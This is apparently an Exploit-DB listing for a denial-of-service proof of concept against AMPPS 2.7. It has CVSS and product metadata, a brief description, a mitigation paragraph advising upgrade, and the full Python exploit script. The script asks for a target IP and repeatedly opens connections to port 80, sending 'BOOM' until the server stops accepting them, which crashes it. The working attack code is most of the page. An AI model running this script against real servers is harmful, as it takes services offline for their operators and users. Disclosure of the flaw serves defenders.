AMPPS 2.7 - Denial of Service (PoC)

vendor:

Ampps

by:

Ihsan Sencan

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Ampps

Affected Version From: 2.7

Affected Version To: 2.7

Patch Exists: YES

Related CWE: N/A

CPE: a:ampps:ampps:2.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

AMPPS 2.7 – Denial of Service (PoC)

AMPPS 2.7 is vulnerable to a denial of service attack. An attacker can send a 'BOOM' string to the target server on port 80, causing the server to crash. This can be done by using a simple python script.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of AMPPS. Additionally, administrators should ensure that the server is not exposed to the public internet.

Source

Exploit-DB raw data:

# Exploit Title: AMPPS 2.7 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.ampps.com/
# Software Link: https://kent.dl.sourceforge.net/project/ampps/2.7/Ampps-2.7-setup.exe
# Version: 2.7
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

#!/usr/bin/python
import socket

print """
         \\\|///
       \\  - -  //
        (  @ @ )
 ----oOOo--(_)-oOOo----
   AMPPS 2.7
   Ihsan Sencan
 ---------------Ooooo----
                (   )
       ooooO     ) /
       (   )    (_/
        \ (
         \_)
"""
Ip = raw_input("[Ip]: ")
Port = 80 # Default port
 
d=[]
c=0
while 1:
    try:
        d.append(socket.create_connection((Ip,Port)))
        d[c].send("BOOM")
        print "Sie!"
        c+=1
    except socket.error: 
        print "Done!"
        raw_input()
        break